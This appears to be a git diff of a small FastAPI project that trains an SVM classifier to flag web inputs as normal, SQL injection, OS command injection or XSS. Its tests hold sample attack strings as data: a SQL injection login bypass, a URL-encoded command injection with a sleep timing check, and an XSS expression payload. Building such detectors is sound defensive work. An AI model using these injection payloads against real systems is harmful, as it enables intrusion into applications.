- scrapy=2.8.0=py311h06a4308_0
- seaborn=0.12.2=py311h06a4308_0
- secretstorage=3.3.1=py311h06a4308_1
- semver=2.13.0=pyhd3eb1b0_0
- send2trash=1.8.2=py311h06a4308_0
- service_identity=18.1.0=pyhd3eb1b0_1
- setuptools=68.0.0=py311h06a4308_0
- sip=6.7.12=py311h6a678d5_0
- six=1.16.0=pyhd3eb1b0_1
- smart_open=5.2.1=py311h06a4308_0
- snappy=1.1.10=h6a678d5_1
- sniffio=1.2.0=py311h06a4308_1
- snowballstemmer=2.2.0=pyhd3eb1b0_0
- sortedcontainers=2.4.0=pyhd3eb1b0_0
- soupsieve=2.5=py311h06a4308_0
- sphinx=5.0.2=py311h06a4308_0
- sphinxcontrib-applehelp=1.0.2=pyhd3eb1b0_0
- sphinxcontrib-devhelp=1.0.2=pyhd3eb1b0_0
- sphinxcontrib-htmlhelp=2.0.0=pyhd3eb1b0_0
- sphinxcontrib-jsmath=1.0.1=pyhd3eb1b0_0
- sphinxcontrib-qthelp=1.0.3=pyhd3eb1b0_0
- sphinxcontrib-serializinghtml=1.1.5=pyhd3eb1b0_0
- spyder=5.4.3=py311h06a4308_1
- spyder-kernels=2.4.4=py311h06a4308_0
- sqlalchemy=2.0.25=py311h5eee18b_0
- sqlite=3.41.2=h5eee18b_0
- stack_data=0.2.0=pyhd3eb1b0_0
- starlette=0.27.0=py311h06a4308_0
- statsmodels=0.14.0=py311hf4808d0_0
- sympy=1.12=py311h06a4308_0
- tabulate=0.9.0=py311h06a4308_0
- tbb=2021.8.0=hdb19cb5_0
- tbb4py=2021.8.0=py311hdb19cb5_0
- tblib=1.7.0=pyhd3eb1b0_0
- tenacity=8.2.2=py311h06a4308_0
- terminado=0.17.1=py311h06a4308_0
- text-unidecode=1.3=pyhd3eb1b0_0
- textdistance=4.2.1=pyhd3eb1b0_0
- threadpoolctl=2.2.0=pyh0d69192_0
- three-merge=0.1.1=pyhd3eb1b0_0
- tifffile=2023.4.12=py311h06a4308_0
- tinycss2=1.2.1=py311h06a4308_0
- tk=8.6.12=h1ccaba5_0
- tldextract=3.2.0=pyhd3eb1b0_0
- tokenizers=0.13.3=py311h22610ee_0
- toml=0.10.2=pyhd3eb1b0_0
- tomlkit=0.11.1=py311h06a4308_0
- toolz=0.12.0=py311h06a4308_0
- tornado=6.3.3=py311h5eee18b_0
- tqdm=4.65.0=py311h92b7b1e_0
- traitlets=5.7.1=py311h06a4308_0
- transformers=4.32.1=py311h06a4308_0
- truststore=0.8.0=py311h06a4308_0
- twisted=22.10.0=py311h5eee18b_0
- typing-extensions=4.9.0=pyhd3eb1b0_0
- typing_extensions=4.9.0=py311h06a4308_0
- tzdata=2023d=h04d1e81_0
- uc-micro-py=1.0.1=py311h06a4308_0
- ujson=5.4.0=py311h6a678d5_0
- unidecode=1.2.0=pyhd3eb1b0_0
- unixodbc=2.3.11=h5eee18b_0
- urllib3=1.26.18=py311h06a4308_0
- utf8proc=2.6.1=h27cfd23_0
- uvicorn=0.20.0=py311h06a4308_0
- w3lib=1.21.0=pyhd3eb1b0_0
- watchdog=2.1.6=py311h06a4308_0
- wcwidth=0.2.5=pyhd3eb1b0_0
- webencodings=0.5.1=py311h06a4308_1
- websocket-client=0.58.0=py311h06a4308_4
- werkzeug=2.2.3=py311h06a4308_0
- whatthepatch=1.0.2=py311h06a4308_0
- wheel=0.38.4=py311h06a4308_0
- widgetsnbextension=4.0.5=py311h06a4308_0
- wrapt=1.14.1=py311h5eee18b_0
- wurlitzer=3.0.2=py311h06a4308_0
- xarray=2023.6.0=py311h06a4308_0
- xxhash=0.8.0=h7f8727e_3
- xyzservices=2022.9.0=py311h06a4308_1
- xz=5.4.5=h5eee18b_0
- yaml=0.2.5=h7b6447c_0
- yaml-cpp=0.8.0=h6a678d5_0
- yapf=0.31.0=pyhd3eb1b0_0
- yarl=1.9.3=py311h5eee18b_0
- zeromq=4.3.4=h2531618_0
- zfp=1.0.0=h6a678d5_0
- zict=3.0.0=py311h06a4308_0
- zipp=3.17.0=py311h06a4308_0
- zlib=1.2.13=h5eee18b_0
- zlib-ng=2.0.7=h5eee18b_0
- zope=1.0=py311h06a4308_1
- zope.interface=5.4.0=py311h5eee18b_0
- zstandard=0.19.0=py311h5eee18b_0
- zstd=1.5.5=hc292b87_0
- pip:
- dumper==1.2.0
- faker==22.0.0
prefix: /home/bro/anaconda3

28
main.py Normal file
View File

@ -0,0 +1,28 @@
import joblib
from typing import Union
from fastapi import FastAPI
from pydantic import BaseModel
class Item(BaseModel):
value: str
app = FastAPI()
@app.get("/")
async def read_main():
return {"msg": "Welcome in simple web application that provides prediction whether the sent data is an attack attempt or not. Use /detect/ endpoints with GET or POST methods - POST endpoint awaits for simple json with value assigned to 'value' key :) "}
@app.get("/detect/{value}")
async def detect_input_get(value: Union[str]):
nb_saved = joblib.load("nb.joblib")
vec_saved = joblib.load("vec.joblib")
return {"prediction": str(nb_saved.predict(vec_saved.transform([value])))}
@app.post("/detect/")
async def detect_input_post(item: Item):
nb_saved = joblib.load("nb.joblib")
vec_saved = joblib.load("vec.joblib")
return {"prediction": str(nb_saved.predict(vec_saved.transform([item.value])))}

BIN
nb.joblib Normal file
View File

Binary file not shown.

69
test_main.py Normal file
View File

@ -0,0 +1,69 @@
from fastapi.testclient import TestClient
from main import app
client = TestClient(app)
def test_detect_input_get_normal():
response = client.get("/detect/normaldata")
assert response.status_code == 200
assert response.json() == {"prediction": "['normal']"}
def test_detect_input_post_normal():
response = client.post(
"/detect/",
json={"value": "normaldata"},
)
assert response.status_code == 200
print(response.json())
assert response.json() == {
"prediction": "['normal']"
}
def test_detect_input_get_sqli():
response = client.get("/detect/admin') or '1'='1'--")
assert response.status_code == 200
assert response.json() == {"prediction": "['sql-injection']"}
def test_detect_input_post_sqli():
response = client.post(
"/detect/",
json={"value": "admin') or '1'='1'--"},
)
assert response.status_code == 200
print(response.json())
assert response.json() == {
"prediction": "['sql-injection']"
}
def test_detect_input_get_osi():
response = client.get("/detect/%22%7C%20%5B%205%20-ne%20%24%28echo%20BLTNIK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522")
assert response.status_code == 200
assert response.json() == {"prediction": "['os-command-injection']"}
def test_detect_input_post_osi():
response = client.post(
"/detect/",
json={"value": "%22%7C%20%5B%205%20-ne%20%24%28echo%20BLTNIK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522"},
)
assert response.status_code == 200
print(response.json())
assert response.json() == {
"prediction": "['os-command-injection']"
}
def test_detect_input_get_xss():
response = client.get("/detect/<div style=xss:expressio\6e(alert(1))>")
assert response.status_code == 200
assert response.json() == {"prediction": "['xss']"}
def test_detect_input_post_xss():
response = client.post(
"/detect/",
json={"value": "<div style=xss:expressio\6e(alert(1))>"},
)
assert response.status_code == 200
print(response.json())
assert response.json() == {
"prediction": "['xss']"
}

64
utils/calculate_statistics.py Executable file
View File

@ -0,0 +1,64 @@
import pandas as pd
def countPercentOfNumbers(row):
numberOfChars = len(row['value'])
numberOfDigitsInString = sum(c.isdigit() for c in row['value'])
if (numberOfDigitsInString == 0):
return 0
else:
return (numberOfDigitsInString/numberOfChars) * 100
def countPercentOfLetters(row):
numberOfChars = len(row['value'])
numberOfAlphasInString = sum(c.isalpha() for c in row['value'])
if (numberOfAlphasInString == 0):
return 0
else:
return (numberOfAlphasInString/numberOfChars) * 100
def countPercentOfSpaces(row):
numberOfChars = len(row['value'])
numberOfSpacesInString = sum(c.isspace() for c in row['value'])
if (numberOfSpacesInString == 0):
return 0
else:
return (numberOfSpacesInString / numberOfChars) * 100
def countPercentOfSpecials(row):
numberOfChars = len(row['value'])
numberOfDigitsInString = sum(c.isdigit() for c in row['value'])
numberOfAlphasInString = sum(c.isalpha() for c in row['value'])
numberOfSpacesInString = sum(c.isspace() for c in row['value'])
numberOfSpecials = numberOfChars - numberOfDigitsInString - numberOfAlphasInString - numberOfSpacesInString
if (numberOfSpecials == 0):
return 0
else:
return (numberOfSpecials/numberOfChars) * 100
df = pd.read_csv('../datasets/out.csv',
usecols=range(2),
lineterminator='\n',
header=None)
df = df.rename(columns={0: "type", 1: "value"})
df['numberOfChars'] = df.apply(lambda row: len(row['value']), axis=1)
print('Mean amount of chars by type')
print(df.groupby(['type'])["numberOfChars"].mean())
df['percentOfLetters'] = df.apply(countPercentOfLetters, axis=1)
df['percentOfNumbers'] = df.apply(countPercentOfNumbers, axis=1)
df['percentOfSpecialChars'] = df.apply(countPercentOfSpecials, axis=1)
df['percentOfSpaces'] = df.apply(countPercentOfSpaces, axis=1)
print('Mean percent of alphanumeric by type')
print(df.groupby(['type'])["percentOfLetters"].mean())
print('Mean percent of digits by type')
print(df.groupby(['type'])["percentOfNumbers"].mean())
print('Mean percent of special characters by type')
print(df.groupby(['type'])["percentOfSpecialChars"].mean())
print('Mean percent of spaces by type')
print(df.groupby(['type'])["percentOfSpaces"].mean())

37
utils/csv_generator.py Normal file
View File

@ -0,0 +1,37 @@
#!/usr/bin/python
fileOut = open('../datasets/out.csv', 'w')
file = open('../datasets/regular_web_form_data.txt', 'r')
Lines = file.readlines()
for line in Lines:
fileOut.write("normal,'" + str(line).strip().replace("\n", "") + "'\n")
file.close()
file = open('../datasets/os-command-injection.txt', 'r')
Lines = file.readlines()
for line in Lines:
fileOut.write("os-command-injection,'" + str(line).strip().replace("\n", "") + "'\n")
file.close()
file = open('../datasets/sql-injection.txt', 'r')
Lines = file.readlines()
for line in Lines:
fileOut.write("sql-injection,'" + str(line).strip().replace("\n", "") + "'\n")
file.close()
file = open('../datasets/xss.txt', 'r')
Lines = file.readlines()
for line in Lines:
fileOut.write("xss,'" + str(line).strip().replace("\n", "") + "'\n")
file.close()
fileOut.close()

68
utils/faker_data_generator.py Normal file
View File

@ -0,0 +1,68 @@
#!/usr/bin/python
from faker import Faker
faker = Faker()
print(f'name: {faker.name()}')
print(f'address: {faker.address()}')
print(f'text: {faker.text()}')
file = open("../datasets/regular_web_form_data.txt", "w")
Faker.seed(0)
for _ in range(600):
file.write(faker.ascii_company_email() + "\n")
for _ in range(600):
file.write(faker.city() + "\n")
for _ in range(600):
file.write(faker.country() + "\n")
for _ in range(600):
file.write(faker.postcode() + "\n")
for _ in range(600):
file.write(faker.street_address() + "\n")
for _ in range(600):
file.write(faker.iban() + "\n")
for _ in range(600):
file.write(faker.company() + "\n")
for _ in range(600):
file.write(faker.credit_card_number() + "\n")
for _ in range(600):
file.write(str(faker.date_of_birth()) + "\n")
for _ in range(600):
file.write(faker.domain_name() + "\n")
for _ in range(600):
file.write(faker.job() + "\n")
for _ in range(600):
file.write(faker.sentence(nb_words=10) + "\n")
for _ in range(600):
file.write(faker.passport_number() + "\n")
for _ in range(600):
file.write(faker.name() + "\n")
for _ in range(600):
file.write(faker.phone_number() + "\n")
for _ in range(600):
file.write(faker.ssn() + "\n")
for _ in range(600):
file.write(faker.user_agent() + "\n")
file.close()

BIN
utils/nb.joblib Normal file
View File

Binary file not shown.

38
utils/train_model.py Normal file
View File

@ -0,0 +1,38 @@
import numpy as np
import pandas as pd
import joblib
import matplotlib.pyplot as plt
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.naive_bayes import MultinomialNB, GaussianNB
from sklearn import svm
from sklearn.model_selection import GridSearchCV
# Loading the Data - as different payloads got many special chars csv is loaded using predefined amount of cols to avoid problems with delimiter
data = pd.read_csv('../datasets/out.csv',
usecols=range(2),
lineterminator='\n',
header=None)
y_data=data[0]
x_data=data[1]
split =(int)(0.8*data.shape[0])
x_train=x_data[:split]
x_test=x_data[split:]
y_train=y_data[:split]
y_test=y_data[split:]
# Extracting Features
count_vector = CountVectorizer()
extracted_features = count_vector.fit_transform(x_train)
# Building and Training the Model
tuned_parameters = {'kernel': ['rbf','linear'], 'gamma': [1e-3, 1e-4],'C': [1, 10, 100, 1000]}
model = GridSearchCV(svm.SVC(), tuned_parameters)
model.fit(extracted_features,y_train)
print("Model Trained Successfully!")
print("Accuracy of the model is: ",model.score(count_vector.transform(x_test),y_test)*100)
joblib.dump(model, "nb.joblib")
joblib.dump(count_vector, "vec.joblib")

BIN
utils/vec.joblib Normal file
View File

Binary file not shown.

BIN
vec.joblib Normal file
View File

Binary file not shown.